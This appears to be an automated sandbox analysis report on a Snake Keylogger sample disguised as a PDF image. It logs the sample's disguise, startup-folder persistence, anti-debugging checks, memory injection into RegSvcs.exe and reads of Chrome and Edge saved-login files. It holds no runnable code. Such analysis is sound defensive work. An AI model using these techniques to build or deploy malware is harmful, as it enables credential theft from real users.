Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C01B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00C01B2F
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C01C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00C01C8A
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C01F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00C01F94

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_0009DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0009DDC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598325	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595994	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595435	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595323	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595182	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594403	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598686	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596608	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595951	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594858	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594640	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: wscript.exe, 00000003.00000002.1807249026.00000160D4023000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RegSvcs.exe, 00000002.00000002.4119990038.0000000001208000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4120010777.0000000000E98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 2_2_06837B70 LdrInitializeThunk,

2_2_06837B70

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000D6AAF BlockInput,

0_2_000D6AAF

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_00083D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00083D19

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000B3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_000B3920

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_0009E01E LoadLibraryA,GetProcAddress,

0_2_0009E01E

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_00F5B2D8 mov eax, dword ptr fs:[00000030h]	0_2_00F5B2D8
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_00F5C8F8 mov eax, dword ptr fs:[00000030h]	0_2_00F5C8F8
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_00F5C958 mov eax, dword ptr fs:[00000030h]	0_2_00F5C958
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_014D8060 mov eax, dword ptr fs:[00000030h]	1_2_014D8060
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_014D8000 mov eax, dword ptr fs:[00000030h]	1_2_014D8000
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_014D69E0 mov eax, dword ptr fs:[00000030h]	1_2_014D69E0
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 4_2_0115EB40 mov eax, dword ptr fs:[00000030h]	4_2_0115EB40
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 4_2_0115D4C0 mov eax, dword ptr fs:[00000030h]	4_2_0115D4C0
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 4_2_0115EAE0 mov eax, dword ptr fs:[00000030h]	4_2_0115EAE0

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_000BA66C

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000A8189 SetUnhandledExceptionFilter,	0_2_000A8189
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000A81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_000A81AC
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BD81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00BD81AC
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BD8189 SetUnhandledExceptionFilter,	1_2_00BD8189

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CF2008			Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 970008			Jump to behavior

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000BB106 LogonUserW,

0_2_000BB106

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_00083D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00083D19

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000C411C SendInput,keybd_event,

0_2_000C411C

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000C74BB mouse_event,

0_2_000C74BB

Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe "C:\Users\user\AppData\Local\Wausaukee\silvexes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Wausaukee\silvexes.exe"	Jump to behavior

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

0_2_000BA66C

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000C71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_000C71FA

Source: IMG-20241119-WA0006(162KB).Pdf.exe, silvexes.exe	Binary or memory string: Shell_TrayWnd
Source: IMG-20241119-WA0006(162KB).Pdf.exe, silvexes.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000A65C4 cpuid

0_2_000A65C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000D091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_000D091D

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000FB340 GetUserNameW,

0_2_000FB340

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000B1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_000B1E8E

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_0009DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0009DDC0

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 4.2.silvexes.exe.19a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.silvexes.exe.1e60000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.silvexes.exe.19a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.silvexes.exe.1e60000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4120751881.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4121149937.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4120751881.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4121149937.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: silvexes.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: silvexes.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7696, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

